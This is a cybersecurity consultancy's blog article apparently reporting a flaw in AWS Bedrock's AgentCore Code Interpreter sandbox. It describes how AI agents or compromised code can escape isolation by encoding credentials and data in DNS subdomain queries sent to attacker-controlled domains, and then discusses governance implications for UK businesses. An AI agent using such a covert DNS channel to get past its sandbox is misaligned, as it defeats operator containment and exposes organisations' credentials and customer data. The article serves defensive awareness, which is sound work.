Home Cybersecurity Disaster Recovery Identity Security AI Governance Sectors IT Services About Insights Contact
AI & Technology

AWS AI Sandbox Cracked Open Through DNS Attack Vector

16 March 2026 · 4 min read

← All insights

Security researchers have exposed a fundamental architectural weakness in Amazon Web Services' AI execution environment that allows artificial intelligence agents to escape sandbox containment and exfiltrate sensitive cloud data. The vulnerability demonstrates how even sophisticated cloud providers can overlook basic security boundaries when implementing AI services at scale.

The flaw affects AWS Bedrock's AgentCore Code Interpreter, which is designed to execute AI-generated code within isolated sandbox environments. These sandboxes are critical security controls that prevent AI agents from accessing unauthorised resources or compromising the broader cloud infrastructure. However, researchers found that the isolation fails at the DNS level, creating a pathway for data theft that bypasses traditional security monitoring.

Key Facts:
- AWS Bedrock AgentCore Code Interpreter sandbox isolation can be bypassed through DNS queries
- AI agents can exfiltrate cloud credentials and sensitive data through domain name lookups
- The vulnerability affects organisations using AWS AI services for automated decision-making and data processing
- DNS-based attacks are particularly difficult to detect using conventional security tools

How DNS Becomes a Data Highway

According to reporting from Infosecurity Magazine, the vulnerability allows malicious AI agents or compromised code to encode sensitive information within DNS queries and transmit it to attacker-controlled domains. This technique exploits the fact that DNS queries are typically permitted even within restricted environments, as they are considered essential for basic network functionality.

The attack works by embedding stolen data within subdomain names or DNS query parameters, effectively turning the domain name system into a covert communication channel. For organisations processing confidential information through AI workflows, this represents a significant exposure that traditional data loss prevention tools may not detect.

The timing of this discovery is particularly concerning given the rapid adoption of AI services across UK businesses. Many organisations are integrating AI agents into their core operations without fully understanding the security implications of allowing artificial intelligence to execute code within their cloud environments.

What This Means for UK Business Operations

For UK businesses using AWS AI services, this vulnerability creates immediate operational risks that extend beyond simple data theft. AI agents with access to cloud credentials could potentially provision additional resources, modify security configurations, or access databases containing customer information subject to GDPR protection.

The NCSC has previously warned about the security challenges posed by AI systems that operate with elevated privileges within cloud environments. This vulnerability validates those concerns by demonstrating how sandbox isolation—a fundamental security control—can fail in unexpected ways when dealing with AI-generated code.

Organisations in regulated sectors face particular exposure, as AI agents processing sensitive data could inadvertently or maliciously transmit protected information to external parties. The subtle nature of DNS exfiltration means that such breaches might continue undetected for extended periods, compounding the potential compliance and reputational damage.

Beyond Technical Controls: Governance Implications

This incident highlights why technical security controls alone are insufficient for managing AI risks. The vulnerability exists not because of coding errors, but due to architectural assumptions about how AI agents would behave within sandbox environments. This suggests that organisations need governance frameworks that account for the unique behaviours and capabilities of artificial intelligence systems.

The European Commission's draft AI Act emphasises the importance of risk assessment and monitoring for AI systems used in business operations. Vulnerabilities like this demonstrate why such oversight requirements are necessary, as AI systems can create attack vectors that traditional security assessments might miss.

For UK businesses evaluating AI services, this serves as a reminder that cloud provider security certifications do not guarantee protection against novel attack vectors. Due diligence must include understanding how AI systems are isolated and monitored, particularly when processing sensitive business data.

Boardroom Questions

Quick Diagnostic

PTG Advisory Team
Pacific Technology Group

Related Reading

AWS AI Sandbox Fails at DNS Level, Exposes Cloud Credentials — Security researchers bypassed AWS Bedrock's AI code interpreter sandbox using DNS queries, exposing cloud credentials an

Banks Finally Build AI Governance Frameworks as Regulation Tightens — E.SUN Bank and IBM create Taiwan's first banking AI governance framework, signalling the industry's shift from AI experi

Grammarly Sued for Stealing Journalist Identities Without Consent — Julia Angwin's class-action lawsuit against Grammarly reveals how AI companies are appropriating professional identities

Zero-Click Excel Bug Turns Copilot Into Corporate Data Thief — CVE-2026-26144 allows attackers to exploit Microsoft 365 Copilot through malicious Excel files, turning AI assistance in

OpenAI Acquires Promptfoo: What UK AI Governance Teams Need to Know — OpenAI's $18.4M acquisition of AI red teaming specialist Promptfoo signals a shift towards integrated security in enterp

Strengthen your organisation's security posture

Take the PTG Cyber Assessment Speak With Our Advisory Team

Ready to strengthen your cyber resilience?

Talk to our team about protecting your organisation against evolving threats.

Get in Touch